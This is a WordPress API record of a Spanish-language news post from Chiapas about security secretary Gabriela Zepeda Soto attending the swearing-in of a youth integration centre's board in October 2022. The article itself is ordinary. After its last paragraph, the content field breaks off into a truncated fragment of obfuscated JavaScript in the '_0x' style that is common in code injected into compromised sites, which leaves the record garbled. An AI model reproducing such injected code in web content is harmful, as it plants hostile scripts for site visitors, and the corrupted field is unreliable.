{"id":5689,"date":"2022-10-07T01:55:37","date_gmt":"2022-10-07T01:55:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5689"},"modified":"2022-10-07T01:55:38","modified_gmt":"2022-10-07T01:55:38","slug":"asiste-zepeda-soto-a-toma-de-protesta-del-patronato-del-centro-de-integracion-juvenil-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5689","title":{"rendered":"Asiste Zepeda Soto a toma de protesta del Patronato del Centro de Integraci\u00f3n Juvenil de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Asiste-Zepeda-Soto-a-toma-de-protesta-del-Patronato-del-Centro-de-Integracion-Juvenil-de-Tuxtla7-1024x682.jpg\" alt=\"\" class=\"wp-image-5690\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Asiste-Zepeda-Soto-a-toma-de-protesta-del-Patronato-del-Centro-de-Integracion-Juvenil-de-Tuxtla7-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Asiste-Zepeda-Soto-a-toma-de-protesta-del-Patronato-del-Centro-de-Integracion-Juvenil-de-Tuxtla7-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Asiste-Zepeda-Soto-a-toma-de-protesta-del-Patronato-del-Centro-de-Integracion-Juvenil-de-Tuxtla7-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Asiste-Zepeda-Soto-a-toma-de-protesta-del-Patronato-del-Centro-de-Integracion-Juvenil-de-Tuxtla7-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Asiste-Zepeda-Soto-a-toma-de-protesta-del-Patronato-del-Centro-de-Integracion-Juvenil-de-Tuxtla7.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>06 de octubre del 2022. La secretaria de Seguridad y Protecci\u00f3n Ciudadana refrend\u00f3 el compromiso del gobernador Rutilio Escand\u00f3n de trabajar con la sociedad civil para fortalecer las estrategias en materia de prevenci\u00f3n del delito y de adiccionesTuxtla Guti\u00e9rrez, Chiapas.- La secretaria de Seguridad y Protecci\u00f3n Ciudadana, Gabriela Zepeda Soto, asisti\u00f3 a la toma de protesta de los integrantes del nuevo Patronato del Centro de Integraci\u00f3n Juvenil de Tuxtla Guti\u00e9rrez, en la cual refrend\u00f3 su compromiso de trabajar de manera directa y en coordinaci\u00f3n con la sociedad civil para fortalecer las estrategias en materia de prevenci\u00f3n del delito y de adicciones en Chiapas.Tras el nombramiento de Mar\u00eda Enriqueta Burelo Melgar como presidenta de dicha agrupaci\u00f3n, Zepeda Soto afirm\u00f3 que la participaci\u00f3n de la ciudadan\u00eda es fundamental para construir un Chiapas m\u00e1s seguro y libre de violencia.\u201cTenemos que hacer alianzas y sumar esfuerzos con los patronatos y asociaciones responsables para mejorar nuestros programas y proyectos que se implementan en materia de prevenci\u00f3n del delito y de adicciones y sean m\u00e1s efectivos para nuestros j\u00f3venes que son el presente de Chiapas\u201d, declar\u00f3.Finalmente, Zepeda Soto refrend\u00f3 el compromiso de la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana de garantizar el Estado de derecho y la seguridad en toda la entidad, de acuerdo con las pol\u00edticas p\u00fablicas del gobernador Rutilio Escand\u00f3n Cadenas.Por su parte, la presidenta del Patronato del Centro de Integraci\u00f3n Juvenil de Tuxtla Guti\u00e9rrez, Mar\u00eda Enriqueta Burelo Melgar, manifest\u00f3 que trabajar\u00e1n con la SSyPC de manera coordinada en acciones que fortalezcan el tejido social y el bienestar de las familias chiapanecas.A este importante evento asistieron integrantes del Centro de Integraci\u00f3n Juvenil, Kena Moreno, fundadora y Vicepresidenta Vitalicia del Patronato y Jos\u00e9 Antonio Chi\u00f1as Vaquerizo, director regional; Karla Burguete Torrestiana, secretaria general del H. Ayuntamiento de Tuxtla Guti\u00e9rrez; Juan Jos\u00e9 Zepeda Berm\u00fadez, presidente de la Comisi\u00f3n Estatal de Derechos Humanos, entre otros.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>06 de octubre del 2022. La secretaria de Seguridad y Protecci\u00f3n Ciudadana refrend\u00f3 el compromiso del gobernador Rutilio Escand\u00f3n de trabajar con la sociedad civil para fortalecer las estrategias en materia de prevenci\u00f3n del delito y de adiccionesTuxtla Guti\u00e9rrez, Chiapas.- La secretaria de Seguridad y Protecci\u00f3n Ciudadana, Gabriela Zepeda Soto, asisti\u00f3 a la toma de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5690,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5689","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5689"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5689\/revisions"}],"predecessor-version":[{"id":5691,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5689\/revisions\/5691"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5690"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5689"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5689"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}